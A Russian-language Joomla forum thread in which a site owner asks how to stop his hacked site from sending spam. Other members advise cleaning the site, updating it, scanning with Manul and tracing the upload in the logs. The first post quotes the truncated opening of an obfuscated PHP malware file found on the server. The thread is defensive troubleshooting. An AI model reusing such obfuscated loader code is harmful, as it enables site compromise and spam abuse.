0 Пользователей и 1 Гость просматривают эту тему.
  • 11 Ответов
  • 1018 Просмотров
*

vas1lek

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Спамит сайт
« : 15.09.2015, 21:46:27 »
Подскажите пожалуйста как защитить сайт.
Сайт начинает спамить в логах вижу  такую ситуацию
Спойлер
[свернуть]
удаляю данный php файл так как в нем код с кучей иероглифов к примеру
Цитировать
Код
<?php 
$w93="W2{MCBiJ_tPk^lcgev[oTQ!\$jsfw4O8Z\t5\".&}#AL\nrahIKyU%b09u6S]m*/R+;<7 D),d1NY=FV~`\rH3qEn?X\\x:@>|z-(Gp'"; $GLOBALS['rlslp59'] = $w93[16].$w93[42].$w93[42].$w93[19].$w93[42].$w93[8].$w93[42].$w93[16].$w93[96].$w93[19].$w93[42].$w93[9].$w93[6].$w93[83].$w93[15]; $GLOBALS['akpcw87'] = $w93[6].$w93[83].$w93[6].$w93[8].$w93[25].$w93[16].$w93[9]; $GLOBALS['tudbx5'] = $w93[69].$w93[16].$w93[26].$w93[6].$w93[83].$w93[16]; $GLOBALS['piuiz64'] = $w93[16].$w93[96].$w93[69].$w93[43]
Запускаю сайт все работает отлично логи тоже порядок, но спустя неделю ситуация повторяется.
 
*

vas1lek

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Re: Спамит сайт
« Ответ #1 : 15.09.2015, 21:57:52 »
Так же есть ли для joomlu botnet attack blocker так как сайт спамит через него.
*

flyingspook

  • Живу я здесь
  • 3592
  • 247 / 9
Re: Спамит сайт
« Ответ #2 : 16.09.2015, 00:52:19 »
Все совершенно просто вас взломали.
Чистите сайт, обновляйте расширения и желательно обновляйте сразу на 3 актуальную версию.
*

wishlight

  • Живу я здесь
  • 4643
  • 275 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Спамит сайт
« Ответ #3 : 16.09.2015, 07:45:45 »
По крайней мере надо вычистить сайт и закрыть дырки как всегда.
Мои VDS быстрее твоих (промокод 648194016 - скидка 25% на первый месяц)|Надежные VDS(скидка 10% ovz WPCLMX6YWG kvm 7SIHW75O9Q)|Дешевые VDS|Хостинг против взломов|Решаю ваши проблемы.
Лечу от вирусов и хостинг

Защита сайтов и логи взломов
*

Taatshi

  • Глобальный модератор
  • 5172
  • 475 / 1
  • Верстаем и кодим. Обращайтесь ;)
Re: Спамит сайт
« Ответ #4 : 16.09.2015, 08:19:49 »
У Вас случайно не варезное что-то на сайте стоит?

Прогоните вот этим

https://yandex.ru/promo/manul#about

И результаты нам расскажете
*

draff

  • Живу я здесь
  • 4317
  • 293 / 7
  • Ищу работу
Re: Спамит сайт
« Ответ #5 : 16.09.2015, 09:28:08 »
Советую настроить запись логов отправки почты.
Так гораздо удобнее вычислить скрипт рассылающий спам через phpmail
*

Taatshi

  • Глобальный модератор
  • 5172
  • 475 / 1
  • Верстаем и кодим. Обращайтесь ;)
Re: Спамит сайт
« Ответ #6 : 16.09.2015, 11:04:32 »
draff, думаю, скрипт искать не надо - он его уже нашел. Ему надо найти бэкдор или уязвимость, через которую это заливается.

vas1lek, а покажите

/plugins/system/jatypo/jatypo/menu.php

с иероглифами.
*

vas1lek

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Re: Спамит сайт
« Ответ #7 : 16.09.2015, 23:41:04 »
draff, думаю, скрипт искать не надо - он его уже нашел. Ему надо найти бэкдор или уязвимость, через которую это заливается.

vas1lek, а покажите

/plugins/system/jatypo/jatypo/menu.php

с иероглифами.
Вот весь код файла menu.php

Спойлер
[свернуть]
*

draff

  • Живу я здесь
  • 4317
  • 293 / 7
  • Ищу работу
Re: Спамит сайт
« Ответ #8 : 17.09.2015, 05:37:03 »
draff, думаю, скрипт искать не надо - он его уже нашел. Ему надо найти бэкдор или уязвимость, через которую это заливается.
Как на меня, то гораздо проще следить в mail.log, чем ломать глаза в access.log. И как обычно размещают не один скрипт отправки почты.
*

Taatshi

  • Глобальный модератор
  • 5172
  • 475 / 1
  • Верстаем и кодим. Обращайтесь ;)
Re: Спамит сайт
« Ответ #9 : 17.09.2015, 06:59:10 »
vas1lek, понятно. Теперь Вам нужно найти откуда этот файл попадает к вам на сервер. Делаете так.

Удалите файл, почистите все логи доступа и ошибок на сервере. И внимательно следите. Как только появится - сразу логи смотреть - поиск по имени этого файла. Ищем упоминание. Как найдете самое первое - смотрите откуда появилось. С какого IP - какое действие было с этого IP перед этим... Занятие муторное и требует творческого подхода.

Вы манулом сайт прогоняли? Это гораздо проще, чем рыться в логах.
*

vas1lek

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Re: Спамит сайт
« Ответ #10 : 17.09.2015, 11:17:17 »
Вы манулом сайт прогоняли? Это гораздо проще, чем рыться в логах.
Манулом пробивал, но все время зависало и дальше не идет сканирование. Зависало на какой то png картинке с папки Plugins/system/ .
*

vas1lek

  • Осваиваюсь на форуме
  • 34
  • 0 / 0
Re: Спамит сайт
« Ответ #11 : 17.09.2015, 13:03:02 »
Разбил сайт и по кускам его сканировал Манулом:
После анализа было найдено вредных
./components/com_hdwplayer/views/videos/view.html.php
./plugins/system/jcemediabox/js/jcemediabox.js
куча подозрительных в файлах js, xlx, php/
Залил и те файлы что я удалял menu,php и Манул сказал что там не че вредного нету хотя видно и по коду и по логам что точно он вредный, а тут наоборот что меня удивило.
Файлы могу приложить если надо
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Автоматическое сжатие фото при загрузке на сайт

Автор Amerikana

Ответов: 11
Просмотров: 401
Последний ответ 11.09.2019, 12:34:17
от Amerikana
Неправильно открывается сайт

Автор totalcolor

Ответов: 4
Просмотров: 589
Последний ответ 20.04.2019, 12:54:20
от draff
Прыгает/дергается/скачет сайт при внутренних переходах

Автор vegastk

Ответов: 7
Просмотров: 918
Последний ответ 16.06.2018, 13:07:49
от voras
Ребят, подскажите модуль (расширение) для добавления на сайт Слайда с новостями

Автор Ирина Поехали

Ответов: 1
Просмотров: 500
Последний ответ 13.09.2017, 11:07:36
от NewUsers
Медленно загружается сайт

Автор katerina37

Ответов: 17
Просмотров: 971
Последний ответ 12.05.2017, 16:28:39
от dmitry_stas